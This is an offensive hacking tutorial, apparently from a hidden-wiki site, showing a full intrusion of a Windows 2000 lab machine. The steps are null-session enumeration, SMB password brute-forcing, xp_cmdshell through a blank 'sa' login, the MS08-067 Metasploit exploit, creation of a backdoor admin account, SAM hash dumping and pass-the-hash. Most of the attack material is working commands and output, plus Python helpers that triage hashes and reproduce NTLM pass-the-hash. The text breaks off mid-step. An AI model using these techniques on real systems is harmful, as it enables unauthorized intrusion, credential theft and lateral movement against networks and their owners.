Grey-Box Attack – The Art of Microsoft Windows Attack (Part One)

Let’s go over the grey box attack. When a piece of software or an application is created, it is vital to run several types of tests to make sure the product is complete, secure and efficient. Several testing methods are available for this: black box, white box and grey box. Each offers different possibilities, which we explain in this article.

In this article brought to you by thehiddenwiki.pw, we cover the grey box method, which mixes the black box and white box approaches.

“Grey box” testing combines the two other approaches: it tests both the functionality and the inner workings of a system. The tester gives an input to the system, checks that the result is the expected one, and checks by which process that result was obtained.

In this type of test, the tester knows the role of the system and of its functionalities, and also knows (though not exhaustively) its internal mechanisms (especially the internal data structures and the algorithms used). However, he or she does not have access to the source code.

These tests can hardly be done during the development phase of a project, since they exercise the program’s functionality: the program has to be in a state close to the final one for the tests to be relevant. During “grey box” testing, testers mainly use “black box” methods, since the source code is not accessible; however, the scenarios are designed to reach the underlying processes, and thus test them too.

Of course, the “grey box” method mainly combines the advantages of the “white box” and “black box” methods. Two big benefits stand out:

  • Impartiality: “grey box” tests keep a demarcation between the developers and the tester, since the latter does not study the source code and relies on the results obtained by testing the user interface.
  • Intelligence: by knowing the internal structure of the program, a tester can create more varied and smarter scenarios, in order to be certain to test all the functionalities, but also all the corresponding processes of the program.

At the same time, the main drawback of these tests is the following:

  • Non-exhaustiveness: since the source code is not accessible, “grey box” tests cannot hope to provide complete coverage of the program.

Contents

Introduction

[0x01] – The Art of Microsoft Windows Attack

[0x01a] – Scanning & Enumeration

[0x01b] – Gaining Access

[0x01c] – Escalating Privilege

Introduction

In this lesson, we show methods of hacking into Windows and Linux systems, and also how to use popular hacking tools such as nmap and Metasploit.

We divide the paper into 7 sections, 0x00 to 0x06; only sections 0x01 to 0x04 are technical. In section 0x01 we show the steps to hack into the Windows 2000 operating system. In section 0x02 we switch to the steps of Linux hacking.

The next section, 0x03, covers automated exploitation using Metasploit combined with nmap or Nessus.
The last technical section shows examples of exploiting client software in order to get access to a system.

[0x01] – Grey Box Attack: The Art of Microsoft Windows Attack

In this section we talk about attacking Windows machines on the network. We start with scanning and enumeration, then move on to gaining access to the Windows system and, finally, escalating privilege in order to control the machine completely and use it to attack other machines on the network.

[0x01a] – Grey Box Attack: Scanning & Enumeration

First, start with scanning using nmap (http://nmap.org), which is the best scanner in our opinion.

Recent versions of nmap improve scanning speed, map ports to service names and versions, and add a custom scripting feature (the Nmap Scripting Engine, NSE) that is perfect for penetration testing.

In the first example we use nmap’s service detection (-sV) to find the open ports, which are the channels through which the system can be attacked:

bt nmap-4.85BETA10 # nmap -sV 192.168.80.129

Starting Nmap 4.85BETA10 ( http://nmap.org )

Interesting ports on 192.168.80.129:
Not shown: 990 closed ports

PORT STATE SERVICE VERSION

80/tcp open http Microsoft IIS webserver 5.0
135/tcp open mstask Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp open netbios-ssn
443/tcp open https?
445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds
1025/tcp open mstask Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open msrpc Microsoft Windows RPC
1027/tcp open msrpc Microsoft Windows RPC
1433/tcp open ms-sql-s Microsoft SQL Server 2000 8.00.194; RTM
3372/tcp open msdtc?

1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at  http://www.insecure.org/cgi-bin/servicefp-submit.cgi:

SF-Port3372-TCP:V=4.85BETA10%I=7%D=7/3%Time=4A4DD777%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"x18xc1nxx01")%r(RTSPRequest,6,"x18xc1nxx01")
SF:%r(HTTPOptions,6,"x18xc1nxx01")%r(Help,6,"x18xc1nxx01")%r(S
SF:SLSessionReq,6,"x18xc1nxx01")%r(FourOhFourRequest,6,"x18xc1n
SF:xx01")%r(LPDString,6,"x18xc1nxx01")%r(SIPOptions,6,"x18xc1n
SF:xx01");
MAC Address: 00:0C:29:CC:CF:46 (VMware)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 71.68 seconds

From the result we get the list of open ports, and we know that this system runs IIS 5.0, NetBIOS, the RPC endpoint mapper, SMB and MSSQL 2000, and that the operating system is Windows 2000 (we pick Windows 2000 as the example because we want you to see the big picture of Windows hacking).

The next step is information gathering from NetBIOS and SMB. Windows 2000 allows a “Null Session” (an anonymous connection to the IPC$ share, permitted because the RestrictAnonymous registry value defaults to 0; the holy grail of Windows weaknesses), which lets us enumerate all accounts on the system, along with security policies, local groups and file shares.

We use nmap and its NSE scripts to gather the information. In the past we had to connect to the system through IPC$ (Null Session) with the command [net use \\192.168.80.129\IPC$ "" /u:""] and then enumerate the information with a tool such as SuperScan4 or Winfo. Nowadays nmap (4.85BETA10 here) can perform those tasks by itself with NSE scripts (smb-enum-users, smb-enum-shares, etc.).

bt nmap-4.85BETA10 # nmap --script=smb-enum-users 192.168.80.129

Starting Nmap 4.85BETA10 ( http://nmap.org)
Interesting ports on 192.168.80.129:

Not shown: 990 closed ports

PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
1027/tcp open IIS
1433/tcp open ms-sql-s
3372/tcp open msdtc
MAC Address: 00:0C:29:CC:CF:46 (VMware)

Host script results:
| smb-enum-users:
|_ SERVER\Administrator, SERVER\backup, SERVER\epp, SERVER\epp_contractor, SERVER\Guest, SERVER\IUSR_SERVER, SERVER\IWAM_SERVER, SERVER\Jim, SERVER\John, SERVER\mary, SERVER\molly, SERVER\None, SERVER\TsInternetUser

Nmap done: 1 IP address (1 host up) scanned in 0.63 seconds

From the result, we know all the users on the target system (the SERVER\None entry is not a logon account and is left out):

– Administrator
– backup
– epp
– epp_contractor
– Guest
– IUSR_SERVER
– IWAM_SERVER
– Jim
– John
– mary
– molly
– TsInternetUser

Other techniques that can also list all the users of a target system are enumeration through anonymous LDAP binds and through default SNMP community strings (public/private):

“LDAP Anonymous”: using ldapminer
“Default SNMP Community String”: using snmpwalk

The shared files and folders are also important. If the permissions are not set properly, an attacker may directly upload malicious files to the system.

bt nmap-4.85BETA10 # nmap --script=smb-enum-shares 192.168.80.129

Starting Nmap 4.85BETA10 (http://nmap.org)
Interesting ports on 192.168.80.129:
Not shown: 990 closed ports

PORT STATE SERVICE

80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
1027/tcp open IIS
1433/tcp open ms-sql-s
3372/tcp open msdtc
MAC Address: 00:0C:29:CC:CF:46 (VMware)

Host script results:
| smb-enum-shares:
| Anonymous shares: IPC$
|_ Restricted shares: COVERPG$, Fax$, Inetpub, scripts, ADMIN$, C$

Nmap done: 1 IP address (1 host up) scanned in 0.49 seconds

From the result, we know all the shares: IPC$ (anonymous, i.e. the null session), COVERPG$, Fax$, Inetpub, scripts, ADMIN$ and C$.

Next, since we know all the users from the null session, we can brute-force their passwords with the NSE script “smb-brute”:

bt nmap-4.85BETA10 # nmap --script=smb-brute 192.168.80.129

Starting Nmap 4.85BETA10 ( http://nmap.org )
Interesting ports on 192.168.80.129:

Not shown: 990 closed ports
PORT STATE SERVICE

80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
1027/tcp open IIS
1433/tcp open ms-sql-s
3372/tcp open msdtc

MAC Address: 00:0C:29:CC:CF:46 (VMware)

Host script results:
| smb-brute:
| backup:pukcab => Login was successful
|_ epp:password => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 5.93 seconds

Looking at the result, we have brute-forced the weak passwords of the users backup and epp.
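The three nmap runs above (service scan, smb-enum-users/smb-enum-shares, smb-brute) are easier to act on across many hosts if the scan is saved with -oX and parsed instead of read by eye. The following is an added example, not code from the original article or from the nmap project: it parses nmap’s XML output and pulls out the open ports, the accounts leaked by the null session, the anonymous shares and the successful brute-force logins. The XML embedded here is constructed from the results shown above (with a closed port and a shorter user list added for illustration); it is not a real capture.

```python
import re
import xml.etree.ElementTree as ET

# Constructed nmap -oX output, assembled from the scan results on this page.
# It is sample input for the parser below, not a real capture.
NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" version="4.85BETA10">
<host><status state="up"/>
<address addr="192.168.80.129" addrtype="ipv4"/>
<address addr="00:0C:29:CC:CF:46" addrtype="mac" vendor="VMware"/>
<ports>
<port protocol="tcp" portid="80"><state state="open"/><service name="http" product="Microsoft IIS webserver" version="5.0"/></port>
<port protocol="tcp" portid="139"><state state="open"/><service name="netbios-ssn"/></port>
<port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds" product="Microsoft Windows 2000 microsoft-ds"/></port>
<port protocol="tcp" portid="1433"><state state="open"/><service name="ms-sql-s" product="Microsoft SQL Server 2000" version="8.00.194; RTM"/></port>
<port protocol="tcp" portid="3389"><state state="closed"/><service name="ms-term-serv"/></port>
</ports>
<hostscript>
<script id="smb-enum-users" output="&#xa;SERVER\\Administrator, SERVER\\backup, SERVER\\epp, SERVER\\Guest, SERVER\\None"/>
<script id="smb-enum-shares" output="&#xa;Anonymous shares: IPC$&#xa;Restricted shares: COVERPG$, Fax$, Inetpub, scripts, ADMIN$, C$"/>
<script id="smb-brute" output="&#xa;backup:pukcab =&gt; Login was successful&#xa;epp:password =&gt; Login was successful"/>
</hostscript>
</host>
</nmaprun>
"""


def parse_nmap(xml_text):
    """Return one dict per host: ipv4 address, open ports and host-script outputs."""
    hosts = []
    for h in ET.fromstring(xml_text).iter("host"):
        addr = next(a.get("addr") for a in h.findall("address") if a.get("addrtype") == "ipv4")
        ports = []
        for p in h.findall("./ports/port"):
            if p.find("state").get("state") != "open":
                continue
            svc = p.find("service")
            name = svc.get("name", "?") if svc is not None else "?"
            ver = " ".join(filter(None, (svc.get("product"), svc.get("version")))) if svc is not None else ""
            ports.append((int(p.get("portid")), p.get("protocol"), name, ver))
        scripts = {s.get("id"): s.get("output", "") for s in h.findall("./hostscript/script")}
        hosts.append({"addr": addr, "ports": ports, "scripts": scripts})
    return hosts


def smb_users(scripts):
    """smb-enum-users prints DOMAIN\\user entries separated by commas; keep the user
    part and drop the 'None' entry, which is not a logon account."""
    out = scripts.get("smb-enum-users", "").strip()
    return [u.split("\\")[-1] for u in re.split(r",\s*", out) if u and not u.endswith("\\None")]


def anonymous_shares(scripts):
    m = re.search(r"Anonymous shares:\s*(.*)", scripts.get("smb-enum-shares", ""))
    return [s.strip() for s in m.group(1).split(",") if s.strip()] if m else []


def brute_hits(scripts):
    """Return {user: password} for every 'Login was successful' line of smb-brute."""
    return dict(re.findall(r"^(\S+?):(\S*)\s*=>\s*Login was successful",
                           scripts.get("smb-brute", ""), re.M))


def findings(host):
    """Turn the raw results into the points an attacker (or a defender) acts on first."""
    open_ports = {p[0] for p in host["ports"]}
    notes = []
    if open_ports & {139, 445}:
        notes.append("SMB reachable")
    if 1433 in open_ports:
        notes.append("MSSQL reachable: try sa with a blank password")
    users = smb_users(host["scripts"])
    if users:
        notes.append("null session leaks %d accounts: %s" % (len(users), ", ".join(users)))
    if "IPC$" in anonymous_shares(host["scripts"]):
        notes.append("IPC$ accepts anonymous connections (null session)")
    for user, pw in brute_hits(host["scripts"]).items():
        notes.append("weak password: %s/%s" % (user, pw))
    return notes


if __name__ == "__main__":
    for host in parse_nmap(NMAP_XML):
        print(host["addr"])
        for port, proto, name, ver in host["ports"]:
            print("  %5d/%s %-12s %s" % (port, proto, name, ver))
        for note in findings(host):
            print("  !", note)
```

To use it on a real run, save the scan with nmap -sV --script=smb-enum-users,smb-enum-shares,smb-brute -oX scan.xml TARGET and feed the file contents to parse_nmap(); the script output strings are free text, so the regular expressions are tied to the wording of this nmap version and should be checked against the output of the version you run.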


[0x01b] – Grey Box Attack: Gaining Access

Now we have two account credentials for the attack. We choose “epp”, whose password is “password”, and use psexec (from the Sysinternals PsTools) to spawn a command shell on the target:

C:\> psexec \\192.168.80.129 -u epp -p password -e cmd.exe

PsExec v1.71 - Execute processes remotely
Copyright (C) 2001-2006 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32> ipconfig

Windows 2000 IP Configuration

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . : localdomain
IP Address. . . . . . . . . . . . : 192.168.80.129
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.80.2

C:\WINNT\system32> net user

User accounts for \\SERVER

Administrator backup epp
epp_contractor Guest IUSR_SERVER
IWAM_SERVER Jim John
mary molly TsInternetUser
The command completed successfully.

From the result, we have spawned a command shell with epp’s privileges (epp is a member of Administrators), and the rest of the post-exploitation follows from there.

The target also runs MSSQL 2000, so we guess it uses the default MSSQL 2000 credentials (sa with a blank password). We then use osql to spawn a command shell through the extended stored procedure xp_cmdshell, which executes commands under the SQL Server service account and has long been a gold mine for attackers wanting an interactive command shell:

C:\> osql -S 192.168.80.129 -U sa -P "" -Q "exec master..xp_cmdshell 'dir c:\' "
output

------------------------------------------------------------------------------
Volume in drive C has no label.
Volume Serial Number is 50C0-6A72

Directory of c:\

12/03/2004 04:39p 451 dir.txt
06/04/2004 03:49p <DIR> Documents and Settings
19/03/2009 12:47a <DIR> Inetpub
19/03/2009 12:38a <DIR> Program Files
03/07/2009 04:55p <DIR> WINNT
1 File(s) 451 bytes
4 Dir(s) 3,053,559,808 bytes free
NULL

C:\> osql -S 192.168.80.129 -U sa -P "" -Q "exec master..xp_cmdshell 'net user' "
output

------------------------------------------------------------------------------

Administrator backup cwh
epp epp_contractor Guest
IUSR_SERVER IWAM_SERVER Jim
John mary molly
TsInternetUser
The command completed with one or more errors.

Note: there is also the NSE script “ms-sql-info.nse” for finding machines that accept the account ‘sa’ with a blank password.

For the latest worms such as Conficker/Downadup, nmap’s “smb-check-vulns” script can scan for the MS08-067 vulnerability and for systems already infected by the worm:

bt nmap-4.85BETA10 # nmap --script=smb-check-vulns 192.168.80.129

Starting Nmap 4.85BETA10 ( http://nmap.org )

Interesting ports on 192.168.80.129:
Not shown: 990 closed ports

PORT STATE SERVICE

80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
1027/tcp open IIS
1433/tcp open ms-sql-s
3372/tcp open msdtc

MAC Address: 00:0C:29:CC:CF:46 (VMware)

Host script results:
| smb-check-vulns:
| MS08-067: VULNERABLE
|_ Conficker: Likely CLEAN

Nmap done: 1 IP address (1 host up) scanned in 1.66 seconds

Now we know the target has the MS08-067 vulnerability, so we use the exploitation suite of choice, the Metasploit Framework:

msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show targets
msf exploit(ms08_067_netapi) > set TARGET 1
TARGET => 1
msf exploit(ms08_067_netapi) > set PAYLOAD generic/shell_bind_tcp
PAYLOAD => generic/shell_bind_tcp
msf exploit(ms08_067_netapi) > set RHOST 192.168.80.129
RHOST => 192.168.80.129
msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[*] Triggering the vulnerability...
[*] Command shell session 1 opened (192.168.80.131:51038 -> 192.168.80.129:4444)

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32> ipconfig

Windows 2000 IP Configuration
Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . : localdomain
IP Address. . . . . . . . . . . . : 192.168.80.129
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.80.2

C:\WINNT\system32>net user cwh 1234 /add
net user cwh 1234 /add
The command completed successfully.

C:\WINNT\system32>net localgroup administrators cwh /add
net localgroup administrators cwh /add
The command completed successfully.

C:\WINNT\system32> net user
net user

User accounts for:

------------------------------------------------------------------
Administrator backup cwh
epp epp_contractor Guest
IUSR_SERVER IWAM_SERVER Jim
John mary molly
TsInternetUser
The command completed with one or more errors.

The most popular tool for scanning, enumeration and vulnerability assessment is Nessus (www.nessus.org), which has many features such as high-speed discovery, configuration audit, sensitive data discovery and vulnerability analysis.

[0x01c] – Grey Box Attack: Escalating Privilege

The next step is dumping the SAM database from the target to get all the password hashes; we can use nmap for this too.
The hashes can only be read with administrator privileges (epp is a member of the Administrators group).

bt nmap-4.85BETA10 # nmap --script=smb-pwdump --script-args=smbuser=epp,smbpass=password 192.168.80.129

Starting Nmap 4.85BETA10 ( http://nmap.org )

Interesting ports on 192.168.80.129:
Not shown: 990 closed ports

PORT STATE SERVICE

80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
1027/tcp open IIS
1433/tcp open ms-sql-s
3372/tcp open msdtc
MAC Address: 00:0C:29:CC:CF:46 (VMware)

Host script results:

| smb-pwdump:
| Administrator:1010 > F703F386322B0662E72C57EF50F76A05:C62638B38308E651B21A0F2CCAB3AC9B
| backup:1005 > E84F09BA27610849AAD3B435B51404EE:94FF50F81F9885648A05438F63EA9F91
| epp:500 > E52CAC67419A9A224A3B108F3FA6CB6D:8846F7EAEE8FB117AD06BDD830B7586C
| epp_contractor:1007 > 60F898DDDCAE534EAAD3B435B51404EE:148301D12E96ED2CE24A20C6ED9A2EAF
| Guest:501 > A0E150C75A17008EAAD3B435B51404EE:823893ADFAD2CDA6E1A414F3EBDF58F7
| IUSR_SERVER:1001 > 0C2A09C60FF052D3518640B5D8EB223A:E9C4226B18D023A932473576E62EB5E9
| IWAM_SERVER:1002 > A373B0BEBCEED1FAD95379C32DAD5DEF:803F59A7EA1EA9A65A15310B58A015D3
| Jim:1009 > 209CA2D6E74286E9AAD3B435B51404EE:FF623167AECD14984A0A97E4D3989A89
| John:1004 > 4B69911850133174AAD3B435B51404EE:D5173C778E0F56D9FC47E3B3C829ACA7
| mary:1003 > 879980DE48006E7EAAD3B435B51404EE:BA69764BCCF8F41121E0B3046CE46C67
| molly:1008 > 4B69911850133174AAD3B435B51404EE:D5173C778E0F56D9FC47E3B3C829ACA7
|_ TsInternetUser:1000 > 52FE1A30EB33BA7BE3BB722E78963414:3A07E408DB9CB2331C9C527B0F4A8C52

Nmap done: 1 IP address (1 host up) scanned in 2.58 seconds

Now we have all the hashes (LM:NT) from the target system. Two things stand out: epp has RID 500, so it is the built-in Administrator account renamed, while the account called Administrator (RID 1010) is an ordinary account; and John and molly have identical hashes, so they share the same password. In the past we needed to crack the hashes with a tool such as Cain or rcrack using “rainbow tables”, which costs a lot of time.
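A good deal can be read off a dump like the one above before any cracking starts. The LM hash is computed over the uppercased password split into two 7-byte halves, so a second half of AAD3B435B51404EE means the password is at most 7 characters, and a whole LM hash of AAD3B435B51404EEAAD3B435B51404EE means LM storage is disabled (NoLMHash, available from Windows 2000 SP2) or the password is empty or longer than 14 characters; 31D6CFE0D16AE931B73C59D7E0C089C0 is the NT hash of an empty password. The following is an added example, not code from the original article, that parses smb-pwdump lines and reports these cases, the RID 500 account and accounts sharing a hash; its sample input is the dump printed above.

```python
import re
from collections import defaultdict

# Sample input: the smb-pwdump output shown on this page (user:RID > LM:NT).
PWDUMP = """
Administrator:1010 > F703F386322B0662E72C57EF50F76A05:C62638B38308E651B21A0F2CCAB3AC9B
backup:1005 > E84F09BA27610849AAD3B435B51404EE:94FF50F81F9885648A05438F63EA9F91
epp:500 > E52CAC67419A9A224A3B108F3FA6CB6D:8846F7EAEE8FB117AD06BDD830B7586C
epp_contractor:1007 > 60F898DDDCAE534EAAD3B435B51404EE:148301D12E96ED2CE24A20C6ED9A2EAF
Guest:501 > A0E150C75A17008EAAD3B435B51404EE:823893ADFAD2CDA6E1A414F3EBDF58F7
IUSR_SERVER:1001 > 0C2A09C60FF052D3518640B5D8EB223A:E9C4226B18D023A932473576E62EB5E9
IWAM_SERVER:1002 > A373B0BEBCEED1FAD95379C32DAD5DEF:803F59A7EA1EA9A65A15310B58A015D3
Jim:1009 > 209CA2D6E74286E9AAD3B435B51404EE:FF623167AECD14984A0A97E4D3989A89
John:1004 > 4B69911850133174AAD3B435B51404EE:D5173C778E0F56D9FC47E3B3C829ACA7
mary:1003 > 879980DE48006E7EAAD3B435B51404EE:BA69764BCCF8F41121E0B3046CE46C67
molly:1008 > 4B69911850133174AAD3B435B51404EE:D5173C778E0F56D9FC47E3B3C829ACA7
TsInternetUser:1000 > 52FE1A30EB33BA7BE3BB722E78963414:3A07E408DB9CB2331C9C527B0F4A8C52
"""

EMPTY_LM_HALF = "AAD3B435B51404EE"             # LM hash of an empty 7-byte half
EMPTY_NT = "31D6CFE0D16AE931B73C59D7E0C089C0"  # NT hash (MD4) of the empty password

# Accepts the page's "user:RID > LM:NT" lines, with or without nmap's "| " prefix and "=>".
LINE = re.compile(r"^\|?_?\s*(?P<user>[^:\s]+):(?P<rid>\d+)\s*=?>\s*"
                  r"(?P<lm>[0-9A-Fa-f]{32}):(?P<nt>[0-9A-Fa-f]{32})\s*$")


def parse_pwdump(text):
    entries = []
    for line in text.splitlines():
        m = LINE.match(line.strip())
        if m:
            entries.append({"user": m["user"], "rid": int(m["rid"]),
                            "lm": m["lm"].upper(), "nt": m["nt"].upper()})
    return entries


def triage(entries):
    """Facts that need no cracking: the real built-in Administrator (RID 500),
    passwords of at most 7 characters, accounts without an LM hash, empty
    passwords, and accounts that share a password."""
    r = {"rid500": None, "short_lm": [], "no_lm": [], "empty_nt": [], "shared": {}}
    by_nt = defaultdict(list)
    for e in entries:
        if e["rid"] == 500:
            r["rid500"] = e["user"]
        if e["lm"] == EMPTY_LM_HALF * 2:
            r["no_lm"].append(e["user"])
        elif e["lm"].endswith(EMPTY_LM_HALF):
            r["short_lm"].append(e["user"])
        if e["nt"] == EMPTY_NT:
            r["empty_nt"].append(e["user"])
        by_nt[e["nt"]].append(e["user"])
    r["shared"] = {nt: users for nt, users in by_nt.items() if len(users) > 1}
    return r


if __name__ == "__main__":
    report = triage(parse_pwdump(PWDUMP))
    print("built-in Administrator (RID 500):", report["rid500"])
    print("password <= 7 chars (LM second half empty):", ", ".join(report["short_lm"]))
    print("no LM hash stored:", report["no_lm"])
    print("empty NT password:", report["empty_nt"])
    for nt, users in report["shared"].items():
        print("same password (NT %s):" % nt, ", ".join(users))
```

On this dump the result agrees with the brute-force step: backup (password “pukcab”, 6 characters) and Jim are in the short-LM list, while epp (“password”, exactly 8 characters) and Administrator are not, and the only shared hash belongs to John and molly.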

Now we can save that time with an nmap feature: the smb library treats a password that looks like a hash (32 hex characters, or LM:NT) as the hash itself, so nmap can try to log in to other machines with the gathered hashes and a list of usernames. We do not need to crack the hashes first.

bt nmap-4.85BETA10 # cat password.txt
F703F386322B0662E72C57EF50F76A05
E52CAC67419A9A224A3B108F3FA6CB6D
209CA2D6E74286E9AAD3B435B51404EE

bt nmap-4.85BETA10 # nmap --script=smb-brute --script-args=userdb=usernames.txt,passdb=password.txt 192.168.80.1/24

Starting Nmap 4.85BETA10 ( http://nmap.org )
Interesting ports on 192.168.80.100:

PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb-brute:
|_ Administrator:F703F386322B0662E72C57EF50F76A05 => Login was successful

Interesting ports on 192.168.80.135:

PORT STATE SERVICE
445/tcp open microsoft-ds

Host script results:
| smb-brute:
| epp:E52CAC67419A9A224A3B108F3FA6CB6D => Login was successful
|_ Jim:209CA2D6E74286E9AAD3B435B51404EE => Login was successful

Now we can compromise other systems on the network that use the same password (with the hash alone, nothing cracked). To impersonate the user without knowing the password, use pass-the-hash with the patched Samba suite (http://foofus.net/jmk/passhash.html). I use samba-3.0.22 with the patches:

./configure --with-smbmount
patch -p0 < samba-3.0.22-add-user.patch
patch -p0 < samba-3.0.22-passhash.patch


bt cwh # export SMBHASH="F703F386322B0662E72C57EF50F76A05:C62638B38308E651B21A0F2CCAB3AC9B"
bt cwh # ./smbmount //192.168.80.129/c$ /mnt/passhash -o username=administrator
Password: << Insert hash from SMBHASH (F703F386322B0662E72C57EF50F76A05:C62638B38308E651B21A0F2CCAB3AC9B)
HASH PASS: Substituting user supplied NTLM HASH...
HASH PASS: Substituting user supplied NTLM HASH...
HASH PASS: Substituting user supplied LM HASH...
bt cwh # ls /mnt/passhash/
dir.txt  Documents and Settings  Inetpub  Program Files  WINNT
bt cwh #

Another tool is the Pass-The-Hash Toolkit (http://oss.coresecurity.com/projects/pshtoolkit.html), which impersonates a user without the password.

The Pass-The-Hash Toolkit contains utilities to manipulate the Windows logon sessions maintained by the LSA (Local Security Authority). These tools list the current logon sessions with their NTLM credentials (e.g. users remotely logged in through Remote Desktop/Terminal Services) and can change, at run time, the username, domain name and NTLM hashes of the current session (yes, pass-the-hash on Windows!).
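Both pass-the-hash tools above work for the same reason: NTLM authentication never sends the password; the client proves possession of the NT hash (MD4 of the UTF-16LE password), so whoever holds the hash can answer the server’s challenge exactly as the real user would. The following added example (not code from the original article or from either toolkit) computes the NT hash with a pure-Python MD4, checks it against epp’s hash from the smb-pwdump output above, and then shows the NTLMv2 proof (per MS-NLMP) being produced once from the password and once from the dumped hash, with the server accepting both. The server challenge, the client blob and the function names are constructed for the demonstration. Windows 2000 sends NTLMv1 by default, which derives its response from the same hash with DES instead of HMAC-MD5; the conclusion is the same.

```python
import hashlib
import hmac
import struct

MASK = 0xFFFFFFFF


def _rot(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


# Pure-Python MD4 (RFC 1320). hashlib's md4 is often disabled in OpenSSL 3 builds,
# so it is not relied on. Per round: boolean function, message-word order,
# the four shift amounts, and the additive constant.
_ROUNDS = (
    (lambda x, y, z: (x & y) | (~x & z), range(16), (3, 7, 11, 19), 0),
    (lambda x, y, z: (x & y) | (x & z) | (y & z),
     (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13), 0x5A827999),
    (lambda x, y, z: x ^ y ^ z,
     (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15), 0x6ED9EBA1),
)


def md4(data):
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)            # message length in bits
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for fn, order, shifts, k in _ROUNDS:
            for i, j in enumerate(order):
                t = _rot((a + fn(b, c, d) + X[j] + k) & MASK, shifts[i % 4])
                a, b, c, d = d, t, b, c                 # rotate registers for the next step
        state = [(s + v) & MASK for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password):
    """NT hash = MD4(UTF-16LE(password)); the right-hand value smb-pwdump printed."""
    return md4(password.encode("utf-16le")).hex().upper()


def ntlmv2_response(nt_hash_hex, user, domain, server_challenge, client_blob):
    """NTLMv2 proof (MS-NLMP NTProofStr): derived from the NT hash, never from the password."""
    ntowf_v2 = hmac.new(bytes.fromhex(nt_hash_hex),
                        (user.upper() + domain).encode("utf-16le"), hashlib.md5).digest()
    return hmac.new(ntowf_v2, server_challenge + client_blob, hashlib.md5).hexdigest().upper()


# Constructed demonstration values: the challenge and blob are made up; the hash is
# epp's NT hash from the smb-pwdump output on this page.
EPP_NT_FROM_DUMP = "8846F7EAEE8FB117AD06BDD830B7586C"
SERVER_CHALLENGE = bytes.fromhex("0123456789ABCDEF")
CLIENT_BLOB = bytes.fromhex("0101000000000000" + "00" * 8 + "AABBCCDDEEFF0011" + "00000000")


def server_accepts(stored_nt_hash, user, domain, response):
    """Server side: recompute the proof from the stored NT hash and compare."""
    expected = ntlmv2_response(stored_nt_hash, user, domain, SERVER_CHALLENGE, CLIENT_BLOB)
    return hmac.compare_digest(expected, response)


def login_with_password(password, user="epp", domain="SERVER"):
    return ntlmv2_response(nt_hash(password), user, domain, SERVER_CHALLENGE, CLIENT_BLOB)


def login_with_hash(dumped_nt_hash, user="epp", domain="SERVER"):
    """What pass-the-hash does: skip nt_hash() and start from the dumped value."""
    return ntlmv2_response(dumped_nt_hash, user, domain, SERVER_CHALLENGE, CLIENT_BLOB)


if __name__ == "__main__":
    print("NT('password') =", nt_hash("password"), "matches dump:", nt_hash("password") == EPP_NT_FROM_DUMP)
    print("login with password accepted:",
          server_accepts(EPP_NT_FROM_DUMP, "epp", "SERVER", login_with_password("password")))
    print("login with hash only accepted:",
          server_accepts(EPP_NT_FROM_DUMP, "epp", "SERVER", login_with_hash(EPP_NT_FROM_DUMP)))
```

The first line of output also confirms the brute-force result from the enumeration step: the NT hash of “password” is exactly the value smb-pwdump returned for epp. A practical defensive consequence is that dumped NT hashes must be treated as plaintext credentials and rotated, not merely declared “uncracked”.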

To attack another machine that uses the same credentials, we first need one compromised machine; now that we have a command shell on it, we use “whosthere” to list the credentials held in its logon sessions:

C:\pshtoolkit_v1.4\whosthere>whosthere
WHOSTHERE v1.4 - by Hernan Ochoa - (c) 2007-2008 Core Security Technologies.

This tool lists the active LSA login sessions with NTLM credentials.
(use -h for help).

-B is now used by default. Trying to find the correct addresses...Found!
The output format is: username:domain:lmhash:nthash

cwh:SERVER:00000000000000000000000000000000:8846F7EAEE8FB117AD06BDD830B7586C
Administrator:SERVER2:209CA2D6E74286E9AAD3B435B51404EE:BA69764BCCF8F41121E0B3046CE46C67

C:\pshtoolkit_v1.4\whosthere>cd ..\iam
